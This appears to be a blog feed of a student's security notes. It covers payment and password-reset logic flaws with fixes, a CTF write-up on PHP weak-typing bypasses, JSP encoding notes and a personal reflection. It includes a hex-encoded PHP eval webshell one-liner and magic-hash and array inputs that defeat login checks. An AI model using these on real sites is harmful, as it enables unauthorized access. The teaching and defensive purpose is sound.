class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">>>> </span><span class="string">'<?php @eval($POST[a]); ?>'</span>.encode(<span class="string">'hex'</span>) <span class="comment">#encode</span></span><br><span class="line"><span class="string">'3c3f70687020406576616c2824504f53545b615d293b203f3e'</span></span><br><span class="line"><span class="meta">>>> </span><span class="string">'3c3f70687020406576616c2824504f53545b615d293b203f3e'</span>.decode(<span class="string">'hex'</span>) <span class="comment">#decode</span></span><br><span class="line"><span class="string">'<?php @eval($POST[a]); ?>'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x06-Ascii"><a href="#0x06-Ascii" class="headerlink" title="0x06 Ascii"></a>0x06 Ascii</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>l = <span class="built_in">map</span>(<span class="built_in">ord</span>,<span class="string">"<?php phpinfo(); ?>"</span>)</span><br><span class="line">[<span class="number">60</span>, <span class="number">63</span>, <span class="number">112</span>, <span class="number">104</span>, <span class="number">112</span>, <span class="number">32</span>, <span class="number">112</span>, <span class="number">104</span>, <span class="number">112</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">102</span>, <span class="number">111</span>, <span class="number">40</span>, <span class="number">41</span>, <span class="number">59</span>, <span class="number">32</span>, <span class="number">63</span>, <span class="number">62</span>]</span><br><span class="line"><span class="meta">>>> </span><span class="string">''</span>.join(<span class="built_in">map</span>(<span class="built_in">chr</span>,l))</span><br><span class="line"><span class="string">'<?php phpinfo(); ?>'</span></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="Python编码转换"><a href="#Python编码转换" class="headerlink" title="Python编码转换"></a><div style="text-align:center">Python encoding conversion</div></h1><h1 </summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="Python" scheme="https://cr4ckm3.top/tags/Python/"/>
</entry>
<entry>
<title>Logic vulnerabilities III</title>
<link href="https://cr4ckm3.top/2017/06/07/%E8%B6%8A%E6%9D%83%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/"/>
<id>https://cr4ckm3.top/2017/06/07/%E8%B6%8A%E6%9D%83%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/</id>
<published>2017-06-07T12:16:00.000Z</published>
<updated>2019-08-30T10:00:43.933Z</updated>
<content type="html"><![CDATA[<h1 id="逻辑漏洞–-gt-越权访问"><a href="#逻辑漏洞–-gt-越权访问" class="headerlink" title="逻辑漏洞–>越权访问"></a>Logic vulnerabilities –> broken access control</h1><p>Broken access control</p><ul><li><p>Unauthenticated access<br>Unauthenticated access: accessing, creating, deleting, modifying or reading resources that require authentication without holding any authorization at all.</p></li><li><p>Horizontal privilege escalation<br>Horizontal privilege escalation: at the same user privilege level, being able to create, delete, modify or read another user's data, such as profile details or orders, without ever logging into that user's account.</p></li><li><p>Vertical privilege escalation<br>Vertical privilege escalation: crossing from a low-privilege role into a high-privilege one.</p></li></ul>]]></content>
<summary type="html"><h1 id="逻辑漏洞–-gt-越权访问"><a href="#逻辑漏洞–-gt-越权访问" class="headerlink" title="逻辑漏洞–&gt;越权访问"></a>Logic vulnerabilities –&gt; broken access control</h1><p>Broken access control</p>
<ul>
<li><p>Unauthenticated access</summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
</entry>
<entry>
<title>Logic vulnerabilities II</title>
<link href="https://cr4ckm3.top/2017/06/07/%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/"/>
<id>https://cr4ckm3.top/2017/06/07/%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/</id>
<published>2017-06-07T11:15:54.000Z</published>
<updated>2019-08-30T10:00:42.453Z</updated>
<content type="html"><![CDATA[<h1 id="逻辑漏洞–-gt-支付漏洞"><a href="#逻辑漏洞–-gt-支付漏洞" class="headerlink" title="逻辑漏洞–>支付漏洞"></a>Logic vulnerabilities –> payment vulnerabilities</h1><h1 id="支付漏洞"><a href="#支付漏洞" class="headerlink" title="支付漏洞"></a>Payment vulnerabilities</h1><h2 id="0x00-缺乏数据签名"><a href="#0x00-缺乏数据签名" class="headerlink" title="0x00 缺乏数据签名"></a>0x00 Missing data signature</h2><p><a href="https://">WooYun case: 顺丰宝 business logic vulnerability</a></p><h2 id="0x01-URL中含有可修改敏感数据"><a href="#0x01-URL中含有可修改敏感数据" class="headerlink" title="0x01 URL中含有可修改敏感数据"></a>0x01 Modifiable sensitive data in the URL</h2><p><a href="">WooYun case: 乐视商城 payment logic vulnerability</a></p><h2 id="0x02-替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。"><a href="#0x02-替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。" class="headerlink" title="0x02 替换支付订单,生成两个订单,支付小订单,数据返回替换订单号。"></a>0x02 Order substitution: create two orders, pay for the small one, and swap the order number in the returned data.</h2><p><a href="">WooYun case: 读览天下 payment logic vulnerability</a></p><h2 id="0x03-设计缺陷-可提交负人民币的订单"><a href="#0x03-设计缺陷-可提交负人民币的订单" class="headerlink" title="0x03 设计缺陷(可提交负人民币的订单)"></a>0x03 Design flaw (an order with a negative RMB amount can be submitted)</h2><p><a href="">WooYun case: 天翼云盘通 payment logic vulnerability</a></p><h2 id="0x04-订单提交逻辑漏洞-订单提交Burp可修改运费"><a href="#0x04-订单提交逻辑漏洞-订单提交Burp可修改运费" class="headerlink" title="0x04 订单提交逻辑漏洞(订单提交Burp可修改运费)"></a>0x04 Order submission logic flaw (the shipping fee can be changed with Burp when the order is submitted)</h2><p><a href="">WooYun case: 药房网 order submission logic vulnerability</a></p><h2 id="0x05-绕过支付-直接访问构造的URL-Payload可直接绕过。"><a href="#0x05-绕过支付-直接访问构造的URL-Payload可直接绕过。" class="headerlink" title="0x05 绕过支付 直接访问构造的URL Payload可直接绕过。"></a>0x05 Payment bypass: directly visiting a crafted URL payload skips payment.</h2><p><a href="">WooYun case: 淘美网 payment bypass</a></p><h2 id="0x06-修复方案"><a href="#0x06-修复方案" class="headerlink" title="0x06 修复方案"></a>0x06 Remediation</h2><ul><li>1 When transacting with the bank, sign the data: sign the user's amount and the order.</li><li>2 Do not put sensitive parameters in the URL in plaintext.</li><li>3 Validate client-submitted parameters on the server side.</li><li>4 When computing the amount on the server, always check that it is positive.</li><li>5 Add a server-generated key to the payment flow, used to check whether parameters have been tampered with.</li><li>6 If parameters really must be passed in the URL, verify a signature over them on the backend.</li><li>7 Verify the order amount against the data returned by the top-up interface.</li><li>8 On order submission, the backend checks that the unit price matches the database and returns an error if it does not.</li><li>9 At payment time, pull the data from the server instead of reading the client's values!!</li></ul><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h1><p><a href="">myh0st</a></p>]]></content>
<summary type="html"><h1 id="逻辑漏洞–-gt-支付漏洞"><a href="#逻辑漏洞–-gt-支付漏洞" class="headerlink" title="逻辑漏洞–&gt;支付漏洞"></a>Logic vulnerabilities –&gt; payment vulnerabilities</h1><h1 id="支付漏洞"><a href="#支付漏洞"</summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
</entry>
<entry>
<title>Logic vulnerabilities I</title>
<link href="https://cr4ckm3.top/2017/06/06/%E5%AF%86%E7%A0%81%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/"/>
<id>https://cr4ckm3.top/2017/06/06/%E5%AF%86%E7%A0%81%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/</id>
<published>2017-06-06T12:14:54.000Z</published>
<updated>2019-08-30T10:00:45.213Z</updated>
<content type="html"><![CDATA[<h1 id="逻辑漏洞–-gt-密码重置"><a href="#逻辑漏洞–-gt-密码重置" class="headerlink" title="逻辑漏洞–>密码重置"></a>Logic vulnerabilities –> password reset</h1><h1 id="密码找回"><a href="#密码找回" class="headerlink" title="密码找回"></a><div style="text-align: center">Password recovery</div></h1><h2 id="0x00-密码找回验证条件可社工"><a href="#0x00-密码找回验证条件可社工" class="headerlink" title="0x00 密码找回验证条件可社工"></a>0x00 Password-recovery checks can be social-engineered</h2><p>It only checks that the account matches the e-mail address<br>It only checks that the account matches the phone number<br><a href="https://www.baidu.com/">.</a></p><h2 id="0x01-验证码可爆破"><a href="#0x01-验证码可爆破" class="headerlink" title="0x01 验证码可爆破"></a>0x01 Verification code can be brute-forced</h2><p>One verification code is shared across users<br>The user authentication scheme is flawed<br>The code stays valid for a long time, so it can be brute-forced<br><a href=""></a></p><h2 id="0x02-修改密码未验证用户"><a href="#0x02-修改密码未验证用户" class="headerlink" title="0x02 修改密码未验证用户"></a>0x02 Password change does not verify the user</h2><p>The flow is not strictly controlled and the server performs no verification.<br>The user ID or e-mail appears in the URL and can be changed directly.<br><a href=""></a></p><h2 id="0x03-密码修改页面可预测"><a href="#0x03-密码修改页面可预测" class="headerlink" title="0x03 密码修改页面可预测"></a>0x03 Password-change page is predictable</h2><p>The URL is predictable, so requesting the next step's URL directly bypasses the check.<br><a href=""></a></p><h2 id="0x04-重置密码新密码出现在返回的数据包中"><a href="#0x04-重置密码新密码出现在返回的数据包中" class="headerlink" title="0x04 重置密码新密码出现在返回的数据包中"></a>0x04 The new password appears in the reset response</h2><p><a href=""></a></p><h2 id="0x05-密码重置验证码出现在返回数据包中"><a href="#0x05-密码重置验证码出现在返回数据包中" class="headerlink" title="0x05 密码重置验证码出现在返回数据包中"></a>0x05 The password-reset verification code appears in the response</h2><p><a href=""></a></p><h2 id="0x06-验证码接收帐号由客户端决定"><a href="#0x06-验证码接收帐号由客户端决定" class="headerlink" title="0x06 验证码接收帐号由客户端决定"></a>0x06 The account that receives the verification code is chosen by the client</h2><p>Intercepting with Burp allows the code's recipient to be changed.<br><a href=""></a></p><h2 id="0x07-修改返回包绕过验证码找回密码"><a href="#0x07-修改返回包绕过验证码找回密码" class="headerlink" title="0x07 修改返回包绕过验证码找回密码"></a>0x07 Modifying the response to bypass the verification code during recovery</h2><p><a href=""></a></p><h2 id="0x08-密码重置验证码多人公用"><a href="#0x08-密码重置验证码多人公用" class="headerlink" title="0x08 密码重置验证码多人公用"></a>0x08 The password-reset verification code is shared by multiple users</h2><p><a href=""></a></p><h2 id="0x09-修复方案"><a href="#0x09-修复方案" class="headerlink" title="0x09 修复方案"></a>0x09 Remediation</h2><ul><li>1 Shorten the verification code's validity period</li><li>2 Destroy it as soon as it is used</li><li>3 Increase the code's complexity; using a whole md5 is not hard, is it?</li><li>4 Rate-limit submissions to this function per IP</li><li>5 Bind important parameters to the verification code with synchronisation data or a timestamp;</li><li>6 After a reset, the new password must not be returned in the response.</li><li>7 The account that receives the code is determined by the server; never trust client-submitted data</li></ul>]]></content>
<summary type="html"><h1 id="逻辑漏洞–-gt-密码重置"><a href="#逻辑漏洞–-gt-密码重置" class="headerlink" title="逻辑漏洞–&gt;密码重置"></a>Logic vulnerabilities –&gt; password reset</h1><h1 id="密码找回"><a href="#密码找回"</summary>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
</entry>
<entry>
<title>A brief look at PHP weak typing in CTF</title>
<link href="https://cr4ckm3.top/2017/05/08/%E6%B5%85%E8%B0%88php%E5%BC%B1%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E4%B9%8BCTF/"/>
<id>https://cr4ckm3.top/2017/05/08/%E6%B5%85%E8%B0%88php%E5%BC%B1%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E4%B9%8BCTF/</id>
<published>2017-05-08T02:47:54.000Z</published>
<updated>2019-08-30T10:00:39.803Z</updated>
<content type="html"><![CDATA[<h1 id="弱类型语言-PHP"><a href="#弱类型语言-PHP" class="headerlink" title="弱类型语言:PHP"></a>Weakly typed language: PHP</h1><p>PHP is a very weakly typed language. In most programming languages a variable can hold only one type of data, and that type must be declared before the variable is used, as in C. In PHP, a variable's type is determined by the value assigned to it, so PHP is also a dynamically typed language.</p><p>So in PHP the following assignments are all valid:<br> $a = 123;<br> $a = "abc";<br> $a = array();</p><h2 id="比较操作符"><a href="#比较操作符" class="headerlink" title="比较操作符"></a>Comparison operators</h2><h3 id="等于操作符"><a href="#等于操作符" class="headerlink" title="等于操作符"></a>Equality operator</h3><p><code>$a == $b</code></p><p>This form involves type juggling, for example<br> 123 == '123' //true<br> 1 == '1abc' //true<br> 0 == 'abc' //true<br> intval('3389a') //outputs 3389<br> "0e132456789" == "0e7124511451155" //true<br> "0e132456789" == "0e1" //true<br><code>0 == 'abc'</code> is <code>true</code> because when an int is compared with a string, the string is converted to an integer, and 'abc' converts to 0. (These results are for PHP 7 and earlier; since PHP 8 an int compared with a non-numeric string such as 'abc' or '1abc' is compared as a string, so the first three lines become false there, while the 0e comparisons between two numeric strings remain true.)</p><p>For the last two cases, strings of the form <code>0e\d+</code>, PHP parses them as scientific notation and treats them as equal.<br>Strings that do not match the <code>0e\d+</code> pattern will not compare equal.<br>CTFs test exactly this. Here is a challenge I have done:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'user'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (!ctype_alpha(<span class="variable">$_GET</span>[<span class="string">'user'</span>])){<span class="keyword">echo</span> <span class="string">'Wrong.'</span>;}</span><br><span class="line"> <span class="keyword">if</span> (!is_numeric(<span class="variable">$_GET</span>[<span class="string">'password'</span>])){<span class="keyword">echo</span> <span class="string">'Wrong.'</span>;}</span><br><span class="line"> <span class="keyword">if</span> (md5(<span class="variable">$_GET</span>[<span class="string">'user'</span>]) == md5(<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> (<span class="string">'Flag: '</span>.<span class="variable">$flag</span>);</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Wrong.'</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>From the code above, to get the flag <code>user</code> must consist of letters only, <code>password</code> must be numeric, and the two md5() results must compare equal. So the <code>0e\d+</code> pattern described above gets us through.<br> 240610708 md5('240610708'); // 0e462097431906509019562988736854<br> QNKCDZO md5('QNKCDZO'); // 0e830400451993494058024219903391<br>Similar pairs:<br> md5('aabg7XSs') == md5('aabC9RqS');<br> sha1('aaroZmOk') == sha1('aaK1STfY');<br> sha1('aaO8zKZF') == sha1('aa3OFF9m');<br>Defence:<br>Use <code>$a === $b</code> against the weak comparisons above.</p><h3 id="恒等操作符"><a href="#恒等操作符" class="headerlink" title="恒等操作符:"></a>Identity operator:</h3><p><code>$a === $b</code></p><p>But strict comparison can also be bypassed; the following challenge is another CTF regular.<br>It turns on the parameter type of the md5() function.</p><p><code>string md5 ( string $str [, bool $raw_output = false ] )</code></p><p>md5() expects a string parameter. When an array is passed instead, md5() only emits the warning <code>Warning: md5() expects parameter 1 to be string, array given</code> and cannot compute a hash of the array, so passing two array parameters yields two NULL values, NULL === NULL, and a check such as <code>$a === $b</code> is bypassed. (Again PHP 7 behaviour; in PHP 8 an array argument to md5() throws a TypeError instead.)</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'a'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'b'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$_GET</span>[<span class="string">'a'</span>] != <span class="variable">$_GET</span>[<span class="string">'b'</span>]) {</span><br><span class="line"> <span class="keyword">if</span> (md5(<span class="variable">$_GET</span>[<span class="string">'a'</span>]) === md5(<span class="variable">$_GET</span>[<span class="string">'b'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> (<span class="string">'Flag: '</span>.<span class="variable">$flag</span>);</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Wrong.'</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Wrong.'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Defence:<br>Against this, check whether the value obtained from the request variable is an array before using it.</p><h2 id="比较函数"><a href="#比较函数" class="headerlink" title="比较函数"></a>Comparison functions</h2><h3 id="strcmp"><a href="#strcmp" class="headerlink" title="strcmp()"></a>strcmp()</h3><p><code>int strcmp ( string $str1 , string $str2 )</code><br>strcmp() compares the two string parameters passed to it and returns:</p><pre><code> 0 - if the two strings are equal
&lt;0 - if string1 is less than string2
&gt;0 - if string1 is greater than string2</code></pre><p>Essentially strcmp() converts the two parameters to ASCII, subtracts them, and returns an int.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (strcmp(<span class="variable">$_GET</span>[<span class="string">'password'</span>], <span class="variable">$flag</span>) == <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Flag: '</span>.<span class="variable">$flag</span>);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">print</span> <span class="string">'Invalid password'</span>;</span><br><span class="line"> } </span><br></pre></td></tr></table></figure><p>From the code above, the flag is returned as soon as <code>password</code> compares equal to <code>$flag</code>.<br>Passing <code>password[]=x</code> makes the function error out and return NULL. NULL==0 is then bool(true), so the check is bypassed. (PHP 8 throws a TypeError here as well.)</p><h1 id="另注"><a href="#另注" class="headerlink" title="另注"></a>Additional note</h1><pre><code>First register user A with password 240610708. Then try to log in as user A with password QNKCDZO. If the login succeeds, the site uses an incomplete scheme: a single unsalted md5.
First register user A with password 0E33455555. Then try to log in as user A with password 0E234230570345. If the login succeeds, the site stores passwords in plaintext!</code></pre>]]></content>
<summary type="html"><h1 id="弱类型语言-PHP"><a href="#弱类型语言-PHP" class="headerlink" title="弱类型语言:PHP"></a>Weakly typed language: PHP</h1><p>PHP is a very weakly typed language. In most programming languages a variable can hold only one type of data, and this</summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="PHP弱类型" scheme="https://cr4ckm3.top/tags/PHP%E5%BC%B1%E7%B1%BB%E5%9E%8B/"/>
</entry>
<entry>
<title>On character encoding</title>
<link href="https://cr4ckm3.top/2017/04/07/%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98/"/>
<id>https://cr4ckm3.top/2017/04/07/%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98/</id>
<published>2017-04-07T12:50:00.000Z</published>
<updated>2019-08-30T10:00:44.183Z</updated>
<content type="html"><![CDATA[<p>While learning JSP, I found that when a source file contains Chinese, the page shown to the client could still come out garbled even with charset=gb2312 set in the ContentType.<br>So I started looking into the relevant material.</p><span id="more"></span><div style="text-align: center">The questions that puzzled me were: 1. What is the "ANSI" encoding in the Windows built-in Notepad? 2. Why is the output still garbled after setting charset=gbk/gb2312? 3. What is the difference between pageEncoding and charset? 4. What happens with charset=utf-8?</div><hr><p style="text-align:center;">First, some basics.</p><h1 id="关于Jsp"><a href="#关于Jsp" class="headerlink" title="关于Jsp"></a>About JSP</h1><p>In standard JSP syntax, if the pageEncoding attribute is present, it determines the character encoding of the JSP page; otherwise the charset in the contentType attribute decides; and if charset is absent as well, the JSP page falls back to the default ISO-8859-1.</p><h2 id="pageEncoding"><a href="#pageEncoding" class="headerlink" title="pageEncoding"></a>pageEncoding</h2><p>pageEncoding only governs the encoding used when the JSP is output; it is not sent out as a header.</p><p>pageEncoding tells the web server the encoding of the JSP. The purpose of &lt;%@ page pageEncoding="UTF-8" %&gt; is:<br>to tell the JSP compiler which encoding to use when compiling the JSP file into a Servlet. Typically, when strings defined inside the JSP itself (defined directly in the JSP, not submitted from the browser) come out garbled, the cause is very often that this parameter is set incorrectly.</p><p>pageEncoding is the encoding of the JSP file itself.</p><h2 id="ContentType"><a href="#ContentType" class="headerlink" title="ContentType"></a>ContentType</h2><p>The ContentType attribute specifies the HTTP content type of the response. If ContentType is not specified, it defaults to Text/Html.</p><p>The ContentType attribute specifies the MIME type and the character encoding used when the JSP page responds. The MIME type defaults to "text/html"; the character encoding defaults to "ISO-8859-1". The MIME type and the character encoding are separated by a semicolon.</p><p>The charset in contentType is the encoding of the content the server sends to the client; charset=utf-8 in contentType indicates that the page is output as utf-8.</p><h2 id="编码阶段"><a href="#编码阶段" class="headerlink" title="编码阶段"></a>Encoding stages</h2><p>JSP encoding goes through three stages: the first uses pageEncoding, the second goes from utf-8 to utf-8, and the third is the page produced by Tomcat, which uses contentType.</p><p>The first stage is compiling the JSP into .java. The JSP is read according to the pageEncoding setting, and the result is translated from the specified encoding into uniform UTF-8 Java source (the .java file). If pageEncoding is set wrongly, or not set at all, the Chinese comes out garbled. </p><p>The second stage is javac compiling the Java source into Java bytecode. Whatever encoding the JSP was written in, the result of this stage is always UTF-8 encoded Java source. </p><p>javac reads the Java source as UTF-8 and compiles it into UTF-8 encoded binary (the .class file); this is the JVM's convention for how constant strings are represented in bytecode (Java encoding). </p><p>The third stage is Tomcat (or another application container) loading and executing the Java bytecode produced in stage two. Its output, which is what the client sees, is where the contentType parameter, hidden during stages one and two, takes effect.</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>To sum up how to prevent garbled Chinese:<br>1. Use one consistent encoding across an application, preferably UTF-8, though GBK also works.<br>2. Set the JSP pageEncoding parameter correctly.<br>3. In every JSP/Servlet set contentType="text/html;charset=UTF-8" or call response.setCharacterEncoding("UTF-8"), which indirectly sets the encoding the browser uses.</p><h1 id="补充一点"><a href="#补充一点" class="headerlink" title="补充一点"></a>One more point</h1><p>1. &lt;%@ page contentType="text/html; charset=utf-8"%&gt;<br>2. &lt;%@ page pageEncoding="utf-8"%&gt;<br>3. &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;<br>4. &lt;% request.setCharacterEncoding("utf-8"); %&gt;</p><p>1 and 2 are both encoding settings of the JSP itself: contentType is the encoding of the content the server sends to the client, and pageEncoding is the encoding of the current JSP page itself.</p><p>3 is the encoding of an HTML page; for a plain HTML page rather than a JSP, this must be set so that Chinese is not garbled.<br><a href="http://www.w3school.com.cn/tags/tag_meta.asp">The HTML meta tag</a></p><p>4 is the encoding of the HttpRequest object itself, i.e. the encoding of the client's request.</p><hr><h1 id="关于字符编码"><a href="#关于字符编码" class="headerlink" title="关于字符编码"></a>About character encodings</h1><h2 id="ANSI"><a href="#ANSI" class="headerlink" title="ANSI"></a>ANSI</h2><p>What Windows calls "ANSI" is really the Windows code pages: the actual encoding is chosen according to the current locale, for example GBK under a Simplified Chinese locale.</p><p>The various extended CJK encodings that use 1 to 4 bytes per character are collectively called ANSI encodings. On Simplified Chinese Windows, ANSI means GBK; on Japanese Windows, ANSI means Shift_JIS. Different ANSI encodings are mutually incompatible, so when information is exchanged internationally, text in two languages cannot be stored in the same ANSI-encoded document. Of course, in any ANSI encoding, characters in the range 0x00~0x7F still take one byte per character. This is the biggest and most visible difference between ANSI encodings and Unicode.</p><h2 id="UTF-8"><a href="#UTF-8" class="headerlink" title="UTF-8"></a>UTF-8</h2><p>Distinguish UTF-8 with a BOM from UTF-8 without a BOM.<br>The BOM variant is a Microsoft idiosyncrasy; UTF-8 without a BOM is what is normally used.</p><p>A UTF-8 character can be 1 to 4 bytes long. UTF-8 can represent any character in the Unicode standard. UTF-8 is backward compatible with ASCII. UTF-8 is the preferred encoding for web pages and e-mail. UTF-8 is one of the implementations of Unicode.</p><p>Unicode is a character set; utf-8 is an encoding.</p><h1 id="参考资料:"><a href="#参考资料:" class="headerlink" title="参考资料:"></a>References:</h1><p>Baidu Baike<br><a href="http://blog.csdn.net/kerrywang/article/details/4454895">Blog of 木头的天空</a><br><a href="https://www.zhihu.com/question/20650946">Zhihu</a><br><a href="http://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8">Ruan Yifeng's blog</a><br><a href="http://www.cnblogs.com/muanblog/p/4604809.html">JSP encoding issues explained</a></p>]]></content>
<summary type="html"><p>While learning JSP, I found that when a source file contains Chinese, the page shown to the client could still come out garbled even with charset=gb2312 set in the ContentType.<br>So I started looking into the relevant material.</p></summary>
<category term="Unicode" scheme="https://cr4ckm3.top/tags/Unicode/"/>
<category term="编码" scheme="https://cr4ckm3.top/tags/%E7%BC%96%E7%A0%81/"/>
<category term="Jsp" scheme="https://cr4ckm3.top/tags/Jsp/"/>
</entry>
<entry>
<title>Miscellaneous thoughts</title>
<link href="https://cr4ckm3.top/2017/04/06/%E6%9D%82%E8%B0%88/"/>
<id>https://cr4ckm3.top/2017/04/06/%E6%9D%82%E8%B0%88/</id>
<published>2017-04-06T13:14:54.000Z</published>
<updated>2019-08-30T10:00:40.603Z</updated>
<content type="html"><![CDATA[<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=280 height=52 src="//music.163.com/outchain/player?type=0&id=2213825453&auto=1&height=32"></iframe><span id="more"></span><p style="text-align: center;">Seeing the countdown show only 100 days until the end of junior year, I put down my work and could not help thinking back over these three years at university: what exactly have I studied, what have I actually learned, and what can I do with it.</p><h2 id="反思过去的三年"><a href="#反思过去的三年" class="headerlink" title="反思过去的三年"></a>Reflecting on the past three years</h2><p>Over these three years I did study the textbook material and also taught myself things outside class, but I only ever got halfway before spotting some other new topic, dropping what I was on, and going off to learn that instead. Round and round, I ended up knowing a little of everything and being good at nothing. I have touched C/JAVA/JSP/PHP/Python, yet none of them well. At twenty-something, curiosity about the world runs high and everything looks worth learning, which is how I ended up with no real skill, which amounts to being able to do nothing. Watching the complaints of graduating seniors this season only adds to my restlessness. Over these three years I mostly coasted, doing only the assignments the teachers set and rarely digging deeper into the coursework on my own. That was a bad habit, and fortunately I corrected it in time. Now when I hit a problem, my first reaction is not to ask someone for the answer but to work it out myself through search engines and reading. That is the biggest gain: knowing how to acquire knowledge that is not in the textbook.<br>Another point, and one I have recently come to see as important: this blog has existed for about half a year and is rarely updated. I used to think updating the blog would take too much time, but that is not really so. Writing something down forces the brain to organise the knowledge once before recording it on the blog. First, it is convenient to look up later; second, it is a good way to note the insights from studying and reading, or the points that are easy to forget. So from now on I will record more of my thoughts. Three years have passed, and what I owe will eventually have to be repaid.</p><h2 id="接下来的日子里"><a href="#接下来的日子里" class="headerlink" title="接下来的日子里"></a>The days ahead</h2><p style="text-align: center;">猪猪侠 shared his "white-hat learning path", and one line from it is worth taking to heart: learn how to learn, build study habits, and forge your ability to learn. To reach somewhere far away, not a single step along the way can be skipped.</p><p style="text-align: center;">I am setting myself a small goal here, and will keep at it.</p><hr><h2 id="给自己的忠告"><a href="#给自己的忠告" class="headerlink" title="给自己的忠告"></a>Advice to myself</h2><div style="text-align: center">1. Persistence: no more three days of fishing and two days of drying the nets; 2. Calm: no more restlessness and complaining all day; 3. Study: focus on security techniques and lay solid foundations; 4. Perspective: learn to adapt and do not get stuck on dead ends; 5. Conviction: stick to what is right and do not slide.</div><h1 id="Just-do-it"><a href="#Just-do-it" class="headerlink" title="Just do it!!"></a>Just do it!!</h1>]]></content>
<summary type="html"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=280 height=52 src="//music.163.com/outchain/player?type=0&id=2213825453&auto=1&height=32"></iframe></summary>
<category term="杂记" scheme="https://cr4ckm3.top/tags/%E6%9D%82%E8%AE%B0/"/>
<category term="心得" scheme="https://cr4ckm3.top/tags/%E5%BF%83%E5%BE%97/"/>
</entry>
<entry>
<title>Linux</title>
<link href="https://cr4ckm3.top/2016/08/28/Linux/"/>
<id>https://cr4ckm3.top/2016/08/28/Linux/</id>
<published>2016-08-28T02:47:54.000Z</published>
<updated>2019-08-30T10:00:41.583Z</updated>
